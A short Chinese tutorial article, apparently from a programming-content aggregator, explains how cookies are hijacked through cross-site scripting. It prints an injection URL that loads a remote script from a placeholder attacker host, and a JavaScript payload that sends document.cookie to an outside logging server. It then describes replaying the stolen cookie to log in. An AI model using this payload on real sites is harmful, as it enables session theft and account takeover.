本文主要是介绍说说劫持Cookie的理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
说说劫持 Cookie 的原理
完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。
Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie 被劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。
1 窃取 Cookie
首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如:
http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script>
- 1
XSS Payload 写在 malice.js 中,这样就可以避免直接在 URL 参数中写入大量的脚本代码。
malice.js 内容:
var img = document.createElement("img");
img.src = "http://xxx.com/log?" + escape(document.cookie);
document.body.appendChild(img);
- 1
- 2
- 3
escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。
在此,我们动态创建了一个图片标签,并把 cookie 参数作为对象,发送给后端服务器。
这样就完成了窃取 Cookie 的整个过程。
2 利用 Cookie 登陆账户
一个网站,如果还未登录,一般在右上角有个 “登录” 链接:
假设已经得到了某个账户的 Cookie 信息,那么就可以在 Fiddler 中,模拟 Get 请求:
然后就可以成功登陆网站咯:
《算法导论 第三版英文版》_高清中文版
《深度学习入门:基于Python的理论与实现》_高清中文版
《深入浅出数据分析》_高清中文版
《Python编程:从入门到实践》_高清中文版
《Python科学计算》_高清中文版
《深度学习入门:基于Python的理论与实现》_高清中文版
《深入浅出数据分析》_高清中文版
《Python编程:从入门到实践》_高清中文版
这篇关于说说劫持Cookie的理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!